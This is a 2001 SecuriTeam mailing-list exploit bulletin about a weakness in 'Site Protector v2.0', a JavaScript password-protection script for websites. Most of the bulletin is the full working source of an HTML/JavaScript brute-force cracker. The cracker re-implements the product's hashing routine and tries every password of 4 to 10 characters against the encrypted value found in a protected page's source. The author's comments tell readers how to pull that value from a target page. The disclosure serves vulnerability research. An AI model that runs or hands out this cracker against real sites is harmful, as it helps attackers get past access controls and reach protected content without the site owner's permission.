[EXPL] Site Protector Password Cracker
From: support@securiteam.comDate: 10/07/01
- Previous message: support@securiteam.com: "[NEWS] Cisco PIX Firewall Authentication Denial of Service"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [EXPL] Site Protector Password Cracker Message-Id: <20011007180057.23CA0138C4@mail.der-keiler.de> Date: Sun, 7 Oct 2001 20:00:57 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Site Protector Password Cracker
------------------------------------------------------------------------
SUMMARY
<http://webdeveloper.earthweb.com/webjs/item/0,3602,12754_23741,00.html>
Site Protector, a JavaScript based site protection has been found to
contain a security vulnerability in its algorithm allowing attackers to
decrypt the password used in by product to protect web sites.
DETAILS
Vulnerable systems:
Site Protector version 2.0
<!--
Site Protector v2.0 password cracker.
Author: isox [isox@chainsawbeer.com]
Group: hhp [hhp-programming.net]
URL: 0xc0ffee [0xc0ffee.com]
---
Simply grab the source of the page using site protector and look for the
following code at the bottom of the page:
password=new preferences('<encrypted password here>', 15, 0, 1);
That is your encrypted password =)
Have fun and be cool,
isox
---
//-->
<html>
<head>
<title>Site Unprotector -- Written by isox --
http://hhp-programming.net>
<Scr!pt>
<!--
var checkpass=''
tell=0
cracked=0
counttimes=0
disComp=0
bases=new Array(17,33,57,101);
var
acharset='XYZNOhijkVWHIJ45ncdefMyzopqPQRSTUABKL6789ab_rs23CDEFGlmwtuvg01x'
var storeup='';
function preferences(encryptpass,encryptdepth,what,dis){
disComp=dis
tell=0
tell=what
checkpass=''
counttimes=0
times=encryptdepth
checkpass=encryptpass
orig=''
this.check=mkasci
}
function mkasci(orig) {
if(counttimes == 0) {
storeup=orig
}
ascival = new Array()
for(i=0; i<=orig.length-1; i++) {
for(i1=0; i1<=acharset.length; i1++) {
if(orig.charAt(i) == acharset.charAt(i1)) {
ascival[i]=i1
}
}
}
themeat(ascival)
}
function themeat(basecode) {
if(basecode.length >= 4) {
counttimes++
newcode=0
finalcode=1
for(count=0;count!=basecode.length;count++) {
newcode =
(basecode[(count<(basecode.length-1))?count+1:count-2]+(basecode[count]*bases[2])*(2.303)+basecode[Math.round(((basecode.length-1)*((Math.atan(basecode[(count!=0)?count-1:count+1])*basecode.length)+2*bases[0]))/100)]+1)
newcode = cutoff(newcode)
newcode =
(newcode>basecode[Math.round(basecode.length/2)])?newcode-=bases[3]:newcode+=bases[3]
finalcode = cutoff(((newcode/10)*finalcode)/(basecode.length-bases[0]))
}
var deconstruct=''
eval('var finalcode="'+(finalcode+times)+'"');
for(count=0;count<finalcode.length;count++) {
if(!isNaN(finalcode.charAt(count))) {
deconstruct = deconstruct+finalcode.charAt(count)
}
}
finalcode = deconstruct
var encrypt = new Array()
for(count=2;count<finalcode.length+2;count+=2) {
eval("encrypt["+((count/2)-1)+"]='"+((finalcode.charAt(count-2)!='0')?finalcode.charAt(count-2):'')+""+finalcode.charAt(count-1)+"'")
encrypt[((count/2)-1)]=acharset.charAt(Math.round((acharset.length*encrypt[((count/2)-1)])/100))
}
encrypt=encrypt.join('')
if(counttimes < times) {
mkasci(encrypt)
} else {
counttimes=0
if(encrypt == checkpass) {
cracked = 1;
}
}
}
}
function cutoff(code) {
eval("var whatcode='"+code+"'");
eval("var whatcode2='"+Math.ceil(code)+"'");
bigVal =
(Math.pow(10,whatcode.length-(whatcode2.length)-2)<1)?1:Math.pow(10,whatcode.length-(whatcode2.length)-2);
whatcode3 = Math.round(code*bigVal)/bigVal
return(whatcode3)
}
//-->
</SCRIPT>
</head>
<body bgcolor="#000000" text="silver" link="silver" vlink="white">
<!--TRY HACKING THIS//-->
<CENTER>Site Unprotector<br>Author: <a
href="http://0xc0ffee.com/">isox</a> [<a
href="mailto:isox@chainsawbeer.com">isox@chainsawbeer.com</a>]</CENTER>
<br><br><br>
<p>Please wait while I attempt to crack this password...</p>
<br>
<SCR!PT>
var encryptedpass = ''
while(encryptedpass.length < 4) {
encryptedpass = prompt("Enter Encrypted Password to Crack", "");
}
password = new preferences(encryptedpass,15,0,1);
var foobar='';
// 4 character passwords
for(a=48; a<123; a++) {
if(a == 58) {
a = 65;
}
if(a == 91) {
a = 95;
}
if(a == 96) {
a = 97
}
for(b=48; b<123; b++) {
if(b == 58) {
b = 65;
}
if(b == 91) {
b = 95;
}
if(b == 96) {
b = 97
}
for(c=48; c<123; c++) {
if(c == 58) {
c = 65;
}
if(c == 91) {
c = 95;
}
if(c == 96) {
c = 97
}
for(d=48; d<123; d++) {
if(d == 58) {
d = 65;
}
if(d == 91) {
d = 95;
}
if(d == 96) {
d = 97
}
if(cracked == 1)
break;
foobar = String.fromCharCode(a, b, c, d);
window.status = "Attempting to crack " + encryptedpass + ": " +
foobar;
password.check(foobar);
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
// 5 character passwords
for(a=48; a<123; a++) {
if(a == 58) {
a = 65;
}
if(a == 91) {
a = 95;
}
if(a == 96) {
a = 97
}
for(b=48; b<123; b++) {
if(b == 58) {
b = 65;
}
if(b == 91) {
b = 95;
}
if(b == 96) {
b = 97
}
for(c=48; c<123; c++) {
if(c == 58) {
c = 65;
}
if(c == 91) {
c = 95;
}
if(c == 96) {
c = 97
}
for(d=48; d<123; d++) {
if(d == 58) {
d = 65;
}
if(d == 91) {
d = 95;
}
if(d == 96) {
d = 97
}
for(e=48; e<123; e++) {
if(e == 58) {
e = 65;
}
if(e == 91) {
e = 95;
}
if(e == 96) {
e = 97
}
if(cracked == 1)
break;
foobar = String.fromCharCode(a, b, c, d, e);
window.status = "Attempting to crack " + encryptedpass + ": " +
foobar;
password.check(foobar);
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
// 6 character passwords
for(a=48; a<123; a++) {
if(a == 58) {
a = 65;
}
if(a == 91) {
a = 95;
}
if(a == 96) {
a = 97
}
for(b=48; b<123; b++) {
if(b == 58) {
b = 65;
}
if(b == 91) {
b = 95;
}
if(b == 96) {
b = 97
}
for(c=48; c<123; c++) {
if(c == 58) {
c = 65;
}
if(c == 91) {
c = 95;
}
if(c == 96) {
c = 97
}
for(d=48; d<123; d++) {
if(d == 58) {
d = 65;
}
if(d == 91) {
d = 95;
}
if(d == 96) {
d = 97
}
for(e=48; e<123; e++) {
if(e == 58) {
e = 65;
}
if(e == 91) {
e = 95;
}
if(e == 96) {
e = 97
}
for(f=48; f<123; f++) {
if(f == 58) {
f = 65;
}
if(f == 91) {
f = 95;
}
if(f == 96) {
f = 97
}
if(cracked == 1)
break;
foobar = String.fromCharCode(a, b, c, d, e, f);
window.status = "Attempting to crack " + encryptedpass + ": " +
foobar;
password.check(foobar);
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
// 7 character passwords
for(a=48; a<123; a++) {
if(a == 58) {
a = 65;
}
if(a == 91) {
a = 95;
}
if(a == 96) {
a = 97
}
for(b=48; b<123; b++) {
if(b == 58) {
b = 65;
}
if(b == 91) {
b = 95;
}
if(b == 96) {
b = 97
}
for(c=48; c<123; c++) {
if(c == 58) {
c = 65;
}
if(c == 91) {
c = 95;
}
if(c == 96) {
c = 97
}
for(d=48; d<123; d++) {
if(d == 58) {
d = 65;
}
if(d == 91) {
d = 95;
}
if(d == 96) {
d = 97
}
for(e=48; e<123; e++) {
if(e == 58) {
e = 65;
}
if(e == 91) {
e = 95;
}
if(e == 96) {
e = 97
}
for(f=48; f<123; f++) {
if(f == 58) {
f = 65;
}
if(f == 91) {
f = 95;
}
if(f == 96) {
f = 97
}
for(g=48; g<123; g++) {
if(g == 58) {
g = 65;
}
if(g == 91) {
g = 95;
}
if(g == 96) {
g = 97
}
if(cracked == 1)
break;
foobar = String.fromCharCode(a, b, c, d, e, f, g);
window.status = "Attempting to crack " + encryptedpass + ": " +
foobar;
password.check(foobar);
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
// 8 character passwords
for(a=48; a<123; a++) {
if(a == 58) {
a = 65;
}
if(a == 91) {
a = 95;
}
if(a == 96) {
a = 97
}
for(b=48; b<123; b++) {
if(b == 58) {
b = 65;
}
if(b == 91) {
b = 95;
}
if(b == 96) {
b = 97
}
for(c=48; c<123; c++) {
if(c == 58) {
c = 65;
}
if(c == 91) {
c = 95;
}
if(c == 96) {
c = 97
}
for(d=48; d<123; d++) {
if(d == 58) {
d = 65;
}
if(d == 91) {
d = 95;
}
if(d == 96) {
d = 97
}
for(e=48; e<123; e++) {
if(e == 58) {
e = 65;
}
if(e == 91) {
e = 95;
}
if(e == 96) {
e = 97
}
for(f=48; f<123; f++) {
if(f == 58) {
f = 65;
}
if(f == 91) {
f = 95;
}
if(f == 96) {
f = 97
}
for(g=48; g<123; g++) {
if(g == 58) {
g = 65;
}
if(g == 91) {
g = 95;
}
if(g == 96) {
g = 97
}
for(h=48; h<123; h++) {
if(h == 58) {
h = 65;
}
if(h == 91) {
h = 95;
}
if(h == 96) {
h = 97
}
if(cracked == 1)
break;
foobar = String.fromCharCode(a, b, c, d, e, f, g, h);
window.status = "Attempting to crack " + encryptedpass + ": " +
foobar;
password.check(foobar);
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
// 9 character passwords
for(a=48; a<123; a++) {
if(a == 58) {
a = 65;
}
if(a == 91) {
a = 95;
}
if(a == 96) {
a = 97
}
for(b=48; b<123; b++) {
if(b == 58) {
b = 65;
}
if(b == 91) {
b = 95;
}
if(b == 96) {
b = 97
}
for(c=48; c<123; c++) {
if(c == 58) {
c = 65;
}
if(c == 91) {
c = 95;
}
if(c == 96) {
c = 97
}
for(d=48; d<123; d++) {
if(d == 58) {
d = 65;
}
if(d == 91) {
d = 95;
}
if(d == 96) {
d = 97
}
for(e=48; e<123; e++) {
if(e == 58) {
e = 65;
}
if(e == 91) {
e = 95;
}
if(e == 96) {
e = 97
}
for(f=48; f<123; f++) {
if(f == 58) {
f = 65;
}
if(f == 91) {
f = 95;
}
if(f == 96) {
f = 97
}
for(g=48; g<123; g++) {
if(g == 58) {
g = 65;
}
if(g == 91) {
g = 95;
}
if(g == 96) {
g = 97
}
for(h=48; h<123; h++) {
if(h == 58) {
h = 65;
}
if(h == 91) {
h = 95;
}
if(h == 96) {
h = 97
}
for(i=48; i<123; i++) {
if(i == 58) {
i = 65;
}
if(i == 91) {
i = 95;
}
if(i == 96) {
i = 97
}
if(cracked == 1)
break;
foobar = String.fromCharCode(a, b, c, d, e, f, g, h, i);
window.status = "Attempting to crack " + encryptedpass + ": " +
foobar;
password.check(foobar);
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
// 10 character passwords
for(a=48; a<123; a++) {
if(a == 58) {
a = 65;
}
if(a == 91) {
a = 95;
}
if(a == 96) {
a = 97
}
for(b=48; b<123; b++) {
if(b == 58) {
b = 65;
}
if(b == 91) {
b = 95;
}
if(b == 96) {
b = 97
}
for(c=48; c<123; c++) {
if(c == 58) {
c = 65;
}
if(c == 91) {
c = 95;
}
if(c == 96) {
c = 97
}
for(d=48; d<123; d++) {
if(d == 58) {
d = 65;
}
if(d == 91) {
d = 95;
}
if(d == 96) {
d = 97
}
for(e=48; e<123; e++) {
if(e == 58) {
e = 65;
}
if(e == 91) {
e = 95;
}
if(e == 96) {
e = 97
}
for(f=48; f<123; f++) {
if(f == 58) {
f = 65;
}
if(f == 91) {
f = 95;
}
if(f == 96) {
f = 97
}
for(g=48; g<123; g++) {
if(g == 58) {
g = 65;
}
if(g == 91) {
g = 95;
}
if(g == 96) {
g = 97
}
for(h=48; h<123; h++) {
if(h == 58) {
h = 65;
}
if(h == 91) {
h = 95;
}
if(h == 96) {
h = 97
}
for(i=48; i<123; i++) {
if(i == 58) {
i = 65;
}
if(i == 91) {
i = 95;
}
if(i == 96) {
i = 97
}
for(j=48; j<123; j++) {
if(j == 58) {
j = 65;
}
if(j == 91) {
j = 95;
}
if(j == 96) {
j = 97
}
if(cracked == 1)
break;
foobar = String.fromCharCode(a, b, c, d, e, f, g, h, i ,j);
window.status = "Attempting to crack " + encryptedpass + ": " +
foobar;
password.check(foobar);
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1)
break;
}
if(cracked == 1) {
alert(checkpass + "has been successfully cracked. The magic word is: "
+ foobar);
document.write("<br>" + checkpass + "has been successfully cracked. The
magic word is: " + foobar);
window.status = "Password has been successfully cracked";
} else {
alert("I was unable to crack " + checkpass);
}
</SCRIPT>
</body>
</HTML>
(NOTE: The letter 'I' used inside SCRIPT Tags has been replaced with '!')
ADDITIONAL INFORMATION
The information has been provided by <mailto:isox@chainsawbeer.com> isox.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Cisco PIX Firewall Authentication Denial of Service"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
